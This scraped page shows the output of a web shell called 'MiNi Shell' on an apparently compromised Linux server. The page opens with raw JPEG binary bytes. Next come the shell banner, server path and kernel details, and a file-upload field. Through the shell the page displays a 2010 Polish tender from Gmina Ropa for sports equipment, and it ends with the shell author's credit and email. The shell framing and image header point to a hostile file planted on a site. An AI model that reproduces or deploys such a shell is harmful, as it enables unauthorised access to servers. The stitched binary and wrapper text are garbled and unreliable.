JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100525/143980-N-2010.html

<p class="kh_header"><b>Ropa: Dostawa sprzętu sportowego w ramach projektu Remont i wyposażenie domu ludowego na potrzeby Wiejskiego Domu Kultury i Turystyki w Klimkówce (projekt realizowany w ramach PROW na lata 2007-2013) 
CPV 37400000-2</b><br>
<b>Numer ogłoszenia: 143980 - 2010; data zamieszczenia: 25.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ropa , Ropa 733, 38-312 Ropa, woj. małopolskie, tel. 018 3534014, 3534017, faks 018 3534017.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ropa.iap.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu sportowego w ramach projektu Remont i wyposażenie domu ludowego na potrzeby Wiejskiego Domu Kultury i Turystyki w Klimkówce (projekt realizowany w ramach PROW na lata 2007-2013) 
CPV 37400000-2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy przedmiot zamówienia obejmuje:


Lp.	Elementy 	Ilość - sztuki
1. rowery	    -             10
2. stojak na rowery -    2
3. łyżwy	20 szt. (par)
4. narty biegowe	10 szt. (par)
5. wiązania	10 szt. (par)
6. kijki	10 szt. (par)
7. buty	10 szt. (par)
8. stół do tenisa stołowego	1
9. piłkarzyki stołowe	1
10. dart	1
11. szachy	5
12. warcaby	5


Rowery - sztuk 10

Rowery damskie - sztuk 5
-	rama aluminiowa z obniżoną górną rurką ułatwiającą wsiadanie i zsiadanie,
-	korby stalowe,
-	wkład mechanizmu korbowego na łożyskach kulkowych,
-	przerzutka przód 3 stopniowa stalowa SHIMANO,
-	przerzutka tył 7 stopniowa stalowa SHIMANO,
-	ilość biegów 21,
-	hamulce stalowe przednie i tylne V-BREK oblewane plastikiem,
-	szprychy stalowe, nierdzewne,
-	rozmiar kół 26,
-	siodło piankowe,
-	pedały na łożyskach kulkowych,
-	piasta przód i tył stalowa na łożyskach kulkowych.
Wyposażenie dodatkowe:
-	 podpórka, 
-	oświetlenie przednie i tylne,
-	błotniki przedni i tylny, 
-	dzwonek.
Okres gwarancji min. 12 miesięcy. Certyfikowany serwis gwarancyjny powinien znajdować się co najmniej w jednym z następujących miast: Nowy Sącz, Gorlice, Jasło.

Rowery męskie - sztuk 5
-	rama aluminiowa,
-	korby stalowe,
-	wkład mechanizmu korbowego na łożyskach kulkowych,
-	przerzutka przód 3 stopniowa stalowa SHIMANO,
-	przerzutka tył 7 stopniowa stalowa SHIMANO,
-	ilość biegów 21,
-	hamulce stalowe przednie i tylne V-BREK oblewane plastikiem,
-	szprychy stalowe, nierdzewne,
-	rozmiar kół 26,
-	siodło piankowe,
-	pedały na łożyskach kulkowych, ze stalową osią,
-	piasta przód i tył stalowa na łożyskach kulkowych.
Wyposażenie dodatkowe:
-	podpórka, 
-	oświetlenie przednie i tylne,
-	błotniki przedni i tylny,
-	dzwonek.
Okres gwarancji min. 12 miesięcy. Certyfikowany serwis gwarancyjny powinien znajdować się co najmniej w jednym  z następujących miast: Nowy Sącz, Gorlice, Jasło.


Stojak na rowery - sztuk 2

-	Stojak min. pięciostanowiskowy o długości min. 1,5 m.
-	Wykonany z rur stalowych ocynkowanych ogniowo 
-	Z możliwością pozostawienia wszystkich typów rowerów, w tym górskich.
-	Stojak stawiany lub mocowany do podłoża przez przykręcenie.


Łyżwy - par 20

Łyżwy powinny być przeznaczone do wypożyczalni, łyżwy wyostrzone. 
-	7 par - buty z łyżwami figurowe. Łyżwy skórzane sznurowane, w następujących rozmiarach po jednej parze rozmiary:  36,37 - 2 pary,38,39,40,41,
-	 7 par - buty z łyżwami do gry w hokeja. But może być zbudowany z tworzyw sztucznych lub skóry, lub innych materiałów tekstylnych. Cholewka łyżwy sztywna, opinająca kostkę. Noski zabezpieczone są twardym plastikiem lub nakładkami ze stopów metali. Łyżwy  w następujących rozmiarach 39-2pary,40-2 pary,41,42,43,
-	6 par - łyżwy z regulowaną długością. But usztywniony w okolicach pięty i kostki z elementami dopinającymi (sznurówki, rzep, klamra). Rozmiar buta (29-32) -  2 pary, (33-36) - 2 pary, (37-40) -  2 pary  z możliwością zastosowania innej rozpiętości wymiaru buta (obejmujące wymienione rozmiary).


Narty biegowe -  par 10
Konstrukcja narty - technologia plastra miodu, łagodnie taliowana. Piętki i dzioby nart winny być lekko podgięte. Narta powinna mieć wewnętrznie utwardzone krawędzie. Ślizg powinien być wykonany na bazie grafitu a tym samym powinien zapewniać właściwe wchłanianie smarów, a zarazem być odporny na zarysowania. Struktura i wykończenie ślizgu - fabrycznie wykonane dla zajęć rekreacyjno sportowych. Rdzeń narty wzmocniony. Powierzchnia narty w samej konstrukcji powinna być odporna na zarysowania. Narty muszą być przystosowane do montażu zarówno wiązań typu Salomon (SNF), jak i Rottefella (NNN). Narty muszą posiadać przy dostawie zamontowane wiązania.
Ilość - 10 par (długość nart 131cm - 2 pary, 151 cm - 2 pary, 174 cm -  2 pary, 182cm  - 3 pary, 190cm -  1 para   lub inne na wzrost narciarza od 130 do 190 cm )

Wiązania do narciarstwa biegowego -par  10
Wiązania sportowe o pewnym zamknięciu manualnym, twardość FLEX = 85. Zgodne z dominującymi systemami butów biegowych. Trwałe i estetyczne pozwalające na łatwą wymianę części zamiennych w ramach systemu konstrukcyjnego. Wiązania muszą być przystosowane do montażu zaoferowanych butów.

Buty do narciarstwa biegowego -par 10
Konstrukcja buta winna ułatwiać wykonywanie ewolucji narciarskich, nieprzemakalne, wygodne, posiadające wymienne wkładki, ułatwiające utrzymanie higieny, podeszwa przystosowana do wymogów zapięć uniwersalnych, cholewka lekko podwyższona usztywniająca staw skokowy, trwałe i estetyczne.
Ilość - 10 par (rozmiar buta 36 - 2 pary, 37-1para, 38-1para,39-2 pary, 40-1 para,42-1para,43 - 1 para,44-1 para)

Kije narciarskie do narciarstwa biegowego -par 10
Wykonane z kompozytu włókna szklanego z włóknem węglowym o minimalnej zawartości 40% węgla. O zbieżnym profilu trzonka i łatwo wymienialnych rączce i koszyku w technologii termicznej. Paski różne na lewą i prawą rękę w systemie łatwej regulacji i zapinane w sposób opasający nadgarstek, co uniemożliwia zgubienie kijka w czasie konkurencji. Ząb koszyka wykonany ze stali szybkotnącej lub węglika spiekanego.
Ilość - 10 par ( w tym 2 pary na wzrost 130cm - 150 cm, 2 pary na wzrost 150 cm - 170 cm, 4 pary na wzrost 170cm - 180 cm, 2 pary na wzrost 180 cm - 190 cm ).


Stół do tenisa stołowego - sztuk 1

-	Stabilna konstrukcja oparta na dwóch niezależnych wózkach 
-	Blat: min 18 mm na stalowej ramie nośnej 
-	Dodatkowe narożniki ochronne 
-	Możliwość gry pojedynczej 
-	Siatka w komplecie ze stołem
-	Konstrukcja z profili stalowych, malowanych proszkowo 
-	4 zamki do bezpiecznego składania stołu 
-	4 niezależne stalowe blokady nóg 
-	Osobny wózek z profili stalowych na każdą połowę stołu 
-	Podwójne zabezpieczenie przy złożonym i rozłożonym stole 
-	Specjalne łączenie stabilizujące obie połowy podczas gry 
-	Łatwy w obsłudze mechanizm składania stołu 
-	Kółka z łożyskowanym z oponkami i hamulcem 
-	Wymiary: 274 x 152 x 76 cm
-	W zestawie ze stołem 2 rakietki oraz 2 piłeczki do tenisa stołowego
-	Gwarancja min. 24 miesiące

Piłkarzyki - sztuk 1
-	Wykonanie płyta MDF pokryta laminatem 
-	Gumowe uchwyty piłkarzyków
-	Gruba na min. 12 mm płyta gry
-	Masywna konstrukcja
-	Piłkarzyki na stalowych prowadnicach
-	Prowadnice oraz piłkarzyki zabezpieczone gumowymi stoperami
-	Min. 4 piłeczki w zestawie
-	Gwarancja min. 12 miesięcy
Dart elektroniczny -sztuk 1
-	Materiał: tworzywo sztuczne 
-	Średnica pola gry: min. 38 cm 
-	Wyświetlacz LCD 
-	Min. 26 gier 
-	Sygnalizacja dźwiękowa 
-	Automatyczne wyłączanie po 30 minutach bezczynności 
-	Wbudowane uchwyty do zamocowania na ścianie 
-	Zasilanie: baterie 
-	Rzutki z kompletem końcówek 
-	Instrukcja obsługi i zasady gry
Szachy - sztuk 5

-	Szachy i pionki wykonane z drewna
-	Wymiar szachownicy po rozłożeniu: min. 36 x 36 cm
-	Szachownica składana
-	Figury z obciążnikami metalowymi poprawiającymi stabilność figury na planszy
Warcaby - sztuk 5
-	Szachownica wykonana z drewna
-	Wymiar szachownicy po rozłożeniu: min. 36 x 36 cm
-	Szachownica składana
Uwaga!!! Użyte w opisie przedmiotu zamówienia nazwy producentów służą jedynie do określenia wymagań zamawiającego, co do jakości i parametrów sprzętu objętego dostawą. Zamawiający dopuszcza sprzęt innych producentów o parametrach, co najmniej takich jak wyżej określone..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.40.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Z uwagi na wartość zamówienia nie przekraczającą kwot określonych w przepisach
wydanych na podstawie art. 11 ust. 8, Zamawiający nie wymaga od Wykonawców wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia 
o spełnieniu warunków udziału w postępowaniu określonych w art. 22. 1 pzp - na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia 
o spełnieniu warunków udziału w postępowaniu określonych w art. 22. 1 pzp - na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia 
o spełnieniu warunków udziału w postępowaniu określonych w art. 22. 1 pzp - na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia 
o spełnieniu warunków udziału w postępowaniu określonych w art. 22. 1 pzp - na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia 
o spełnieniu warunków udziału w postępowaniu określonych w art. 22. 1 pzp - na zasadzie spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany formularz oferty  - wg załącznika Nr 1 do SIWZ,
2. Wypełniony i podpisany formularz wyceny przedmiotu zamówienia - wg załącznika Nr 2 do SIWZ.
3. Zaakceptowany wzór umowy wg załącznika Nr 4 do SIWZ,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne postanowienia do umowy zawiera wzór umowy - załącznik Nr 4 do SIWZ.
2. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia
2.1 Zmiana terminu realizacji przedmiotu umowy

2.2. Zmiana sposobu spełnienia świadczenia - zmiany technologiczne, w szczególności:
a) niedostępność na rynku urządzeń wskazanych w specyfikacji spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych urządzeń;
b) pojawienie się na rynku urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy;
c) konieczność zrealizowania zamówienia przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w specyfikacji, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem zamówienia,

2.3. Pozostałe zmiany 
a) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
b) zmiana obowiązującej stawki VAT; Jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez wykonawcę. 
c) zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy na skutek zmian zawartej przez zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji zamówienia;
d) rezygnacja przez zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami. 
e) zmiany uzasadnione okolicznościami o których mowa w art. 357.1 Kc z uwzględnieniem faktu, że za rażącą zostanie uznana strata w wysokości, o której mowa w art. 397 ksh. 

3. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
a) skorzystanie z klauzul waloryzacyjnych przewidzianych w umowie na warunkach w niej określonych.
b) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego, zmiana dokumentów potwierdzających uregulowanie płatności wobec podwykonawców);
c) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy stronami;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ropa.iap.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Kultury w Ropie, 38 - 312 Ropa   
tel. (018) 353-06-11, fax. (018) 353-06-11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2010 godzina 09:30, miejsce: Urząd Gminy Ropa, 38 - 312 Ropa 733, pokój nr 1 (Sekretariat - II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt dofinansowany ze środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich, w ramach działania Odnowa i Rozwój Wsi objętego Programem Rozwoju Obszarów Wiejskich na lata 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com